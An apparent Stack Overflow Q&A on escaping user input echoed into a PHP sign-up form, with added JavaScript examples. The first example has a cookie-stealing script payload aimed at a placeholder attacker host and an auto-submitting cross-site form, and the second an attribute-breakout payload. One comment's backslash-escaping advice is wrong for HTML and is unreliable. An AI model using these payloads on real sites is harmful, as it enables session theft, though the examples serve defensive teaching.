
Apologies if this has been asked before - but in this case I feel there is an overload of information out there, rather than too little. There also appears to be conflicting opinions everywhere I look. Any clarification would be much appreciated.

I have a user sign-up form. I have validated the different fields, but I haven't used any sanitization functions on the data (e.g. htmlspecialchars) because I read here that it's best to leave that until output (e.g on a user profile). I am using PDO prepared statements to insert my data, so I am safe there as far as I know.

However, having run my domain through various vulnerability scanners, they reported that my sign-up form was very unsafe and could fall victim to XSS attacks. I believe the snippet of code causing this is as follows:

<input type="text" placeholder="Username" name="user" maxlength="32" value="<?php echo test_input($user); ?>" pattern="^[a-zA-Z0-9]*$" required>

I am echoing that user's input back into the form in case they have an error in another field, so that they can re-submit after correction. Therefore potentially harmful script could be echoed into the page.

However, surely this is only the input from that specific user? The only harm they could cause is to themselves? Is the scanner mistaken or am I largely unaware of the risk?

I have fields for general strings, email address, URLs. What steps do I take to ensure safety for visitors to my site?

Thank you very much for any help/clarification you can give me!

EDIT

function test_input($data)
{
    // Drop surrounding whitespace.
    $data = trim($data);
    // stripslashes() only undoes the backslashes that the long-removed magic_quotes
    // feature added; on PHP 5.4 and later it simply deletes any backslash the user typed.
    $data = stripslashes($data);
    // Encode &, <, >, " and ' so the value can neither close the attribute nor start a tag.
    $data = htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $data;
}
user2228716
  • What does `test_input()` do? – Niet the Dark Absol Aug 08 '17 at 11:59
  • Sorry, that's the function that I have now added to prevent dangerous script from running. I will add it to the original post. Basically my question is if it is necessary at this stage, or if I just return exactly what the user inputted? Thanks for pointing that out. – user2228716 Aug 08 '17 at 12:02
  • [The Great Escapism (Or: What You Need To Know To Work With Text Within Text)](http://kunststube.net/escapism/) – deceze Aug 08 '17 at 12:03

2 Answers


Do I need to htmlspecialchars() user input in an HTML form to prevent XSS?

You need something. htmlspecialchars is generally a good choice. It is simple and doesn't destroy the input.

However, surely this is only the input from that specific user?

It is only the input from that specific user's browser.

That user might have visited an evil third party site, that puts an XSS attack as the default value of an input in a form on their site. Then they set the action of the form to your site. Then they submit the form with JS.

Result: Their code is injected into your site by the user's browser, and their JS is executed on your site (with access to the user's cookies and session).

Quentin
  • Ah, now that makes perfect sense! Thank you so much. So I can submit the original user input into my database (provided I htmlspecialchars it on output), but when echoing user input back into the form for corrections, I should htmlspecialchars it too in case of your given scenario? – user2228716 Aug 08 '17 at 12:16
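The attack Quentin describes, as an added example that is not part of the original post or of any project: a page on a third-party origin auto-submits a form to the sign-up handler with a payload in the username field, the handler fails validation on another field and re-renders the form, and the echoed value is shown once unescaped and once escaped. The escaping function is a JavaScript port of PHP's htmlspecialchars() with ENT_QUOTES; the hostnames, the PAYLOAD string and the handler shape are constructed for illustration.

```javascript
// Added example, not from the original post: the cross-site form attack
// described above, simulated end to end, with the echoed value rendered
// unescaped and escaped. Hostnames and the payload are constructed.

// JavaScript port of PHP htmlspecialchars($s, ENT_QUOTES). PHP encodes the
// apostrophe as &#039; by default and as &apos; with ENT_HTML5; either is fine.
function htmlspecialchars(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// The attacker's payload: closes the value attribute and the <input> tag,
// runs a script, then opens a dummy tag to swallow the rest of the original
// <input>. The victim never typed this; it arrives via their browser.
const PAYLOAD =
  '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script><x a="';

// The page on the attacker's origin. Note that the attacker escapes the
// payload correctly in their own markup: the browser decodes the entities and
// POSTs the raw payload to the victim site, with the victim's cookies attached.
function attackerPage(targetUrl) {
  return [
    `<form id="f" method="POST" action="${targetUrl}">`,
    `  <input type="hidden" name="user" value="${htmlspecialchars(PAYLOAD)}">`,
    `  <input type="hidden" name="email" value="not-an-email">`,
    `</form>`,
    `<script>document.getElementById("f").submit();</script>`,
  ].join("\n");
}

// The victim's handler: the email field fails validation, so the form is
// re-rendered with the submitted username echoed back into the value attribute.
function renderSignupForm(user, escapeOutput) {
  const value = escapeOutput ? htmlspecialchars(user) : user;
  return `<input type="text" placeholder="Username" name="user" maxlength="32" ` +
    `value="${value}" pattern="^[a-zA-Z0-9]*$" required>`;
}

// Crude detector for a <script> start tag that survived into the markup.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone run: the attacker's page, then both renderings by the victim.
console.log(attackerPage("https://victim.example/signup.php"));
console.log(renderSignupForm(PAYLOAD, false)); // attribute closed, script tag in the page
console.log(renderSignupForm(PAYLOAD, true));  // payload stays inside the attribute as text
```

The pattern attribute on the input is enforced by the browser only, and the attacker's page never runs it; whatever the server does with the username, the line that echoes it back must escape for the attribute context it lands in.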

When inserting any variables into another context, you should also run them through htmlspecialchars() (or noHTML() above) to ensure they don't break out and add extra attributes to the parent element.

This is safe:

<input type="text" name="username" value="<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />

This, too, is safe against XSS attacks, but still a bad idea:

<?php echo $htmlp->purify("<input type=\"text\" name=\"username\" value=\"".$_GET['username']."\" />"); ?>

As it turns out, context matters a lot for preventing cross-site scripting attacks. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute).

Full Source: https://paragonie.com/blog/2015/06/preventing-xss-vulnerabilities-in-php-everything-you-need-know

Shahroze Nawaz
  • That's a great source, thanks a lot. I agree to use ENT_QUOTES for security, however, what if I want to permit single quotations (') in one of my fields? Otherwise wouldn't "I don't like XSS attacks" be output as something like "I don't like XSS"? – user2228716 Aug 08 '17 at 12:25
  • You can escape the quote with a backslash ` "I don\'t like XSS attacks" `. If you find my answer useful, give it an upvote :) – Shahroze Nawaz Aug 08 '17 at 12:53
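An added example (not from the original post or the linked article) for the "context matters" point in the answer above and for the single-quote question in the comments: the same value is placed in a single-quoted and a double-quoted attribute, escaped once without and once with ENT_QUOTES, and a minimal entity decoder stands in for the browser to show that an encoded apostrophe still renders as an apostrophe, so nothing is lost. The flag strings, the helper names and the payload are constructed for illustration; the escaping function is a JavaScript port of PHP's htmlspecialchars().

```javascript
// Added example, not from the original post or the linked article: why the
// escaping has to match the attribute's quoting, and that entity encoding
// round-trips characters such as the apostrophe. Names and inputs are constructed.

// Port of PHP htmlspecialchars(): ENT_COMPAT leaves ' alone, ENT_QUOTES encodes
// it as &#039; (the flag is modelled as a string here; PHP uses constants).
function htmlspecialchars(s, flags = "ENT_QUOTES") {
  let out = s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
  if (flags === "ENT_QUOTES") out = out.replace(/'/g, "&#039;");
  return out;
}

// Minimal entity decoder standing in for what the browser does when it parses
// an attribute value; it covers exactly the entities produced above.
function decodeEntities(s) {
  return s
    .replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)))
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&amp;/g, "&");
}

// Render the value into a value attribute delimited by the given quote character.
function renderInput(value, quote, flags) {
  return `<input type="text" name="comment" value=${quote}${htmlspecialchars(value, flags)}${quote}>`;
}

// Crude re-parse of the attribute: the raw text between the delimiters, and
// whatever follows before the closing '>' (non-empty means the value broke out).
function attributeBreakout(html, quote) {
  const m = html.match(new RegExp(`value=${quote}([^${quote}]*)${quote}(.*)>$`));
  if (!m) return null;
  return { raw: m[1], trailing: m[2] };
}

// Stand-alone run.
const payload = "' onfocus='alert(1)";
console.log(renderInput(payload, "'", "ENT_COMPAT")); // new onfocus attribute appears
console.log(renderInput(payload, "'", "ENT_QUOTES")); // stays inside the value
const text = "I don't like XSS attacks";
console.log(htmlspecialchars(text));                  // source shows &#039;
console.log(decodeEntities(htmlspecialchars(text)));  // browser shows the apostrophe
```

The apostrophe is not removed or replaced in what the user sees: it appears as `&#039;` in the HTML source and as `'` on screen and in the submitted form value, so there is no need to add backslashes to the stored text.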